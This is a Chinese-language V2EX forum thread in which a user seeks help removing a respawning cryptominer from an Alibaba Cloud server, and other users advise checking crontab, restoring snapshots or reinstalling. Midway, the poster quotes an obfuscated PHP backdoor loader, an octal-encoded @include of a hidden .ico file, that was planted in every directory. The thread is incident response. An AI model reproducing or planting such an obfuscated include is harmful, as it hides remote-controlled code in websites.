阿里云 ECS 被挖矿程序跑满 CPU,在线求助

2019-01-30 10:22:46 +08:00
 liuchang8877

实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862

3927 次点击
所在节点    问与答
21 条回复
CivAx
2019-01-30 10:25:00 +08:00
既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ?
liuchang8877
2019-01-30 10:26:40 +08:00
没用的,有定时任务应该,kill 掉后还是会重启
已经从参考这个做了,还是不行,没找到它的定时任务

https://blog.csdn.net/zzf1510711060/article/details/83015700
ThirdFlame
2019-01-30 10:28:50 +08:00
/etc/crontab 查看一下
westoy
2019-01-30 10:28:50 +08:00
先找个做安全的查查系统日志和程序日志, 看看是怎么被日的

再把数据和程序备份下, 如果问题出在程序上, 修正之

重做系统

重新导入数据和安装程序

不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了
PureWhiteWu
2019-01-30 10:30:02 +08:00
直接重装系统啊。。。。
egen
2019-01-30 10:30:52 +08:00
既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了
CivAx
2019-01-30 10:31:27 +08:00
@liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼
AstroProfundis
2019-01-30 10:33:29 +08:00
备份数据
开一台新的 ecs
部署干净环境
改强密码 /证书登录&检查应用的安全漏洞
导入备份的数据
改访问(域名、ip 之类)地址
旧 ecs 关机,观察没问题之后销毁旧 ecs
zhoulouzi
2019-01-30 10:34:41 +08:00
不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了
liuchang8877
2019-01-30 10:39:37 +08:00
哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。
liuchang8877
2019-01-30 10:46:12 +08:00
这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库?

<?php
/*fb6ae*/

@include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co";

/*fb6ae*/
msg7086
2019-01-30 10:47:44 +08:00
备份数据重装不就得了。清理病毒什么的就不要多想了……
liuchang8877
2019-01-30 10:49:15 +08:00
只能重装了,奋战....
goodryb
2019-01-30 12:17:40 +08:00
如果由之前的快照,直接回滚之前的快照即可。
如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。

快照是个好东西,一定要开起来
ccc008
2019-01-30 12:37:50 +08:00
@liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。
cpdyj0
2019-01-30 12:44:09 +08:00
备份文件,重装系统…最简单粗暴但却有效的办法…
DANG
2019-01-30 12:49:53 +08:00
proc 下根据 pid 找文件路径删文件杀进程
crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。
这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本
yuikns
2019-01-30 12:49:56 +08:00
人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。

还是重装吧。
jay4497
2019-01-30 13:53:28 +08:00
include 的那段 https://www.unphp.net/decode/d99b8171c0ae8442aaa54df56cdcadf0/
liuchang8877
2019-01-30 13:58:02 +08:00
@jay4497
多谢,我给这个也删了试试

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/531791

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX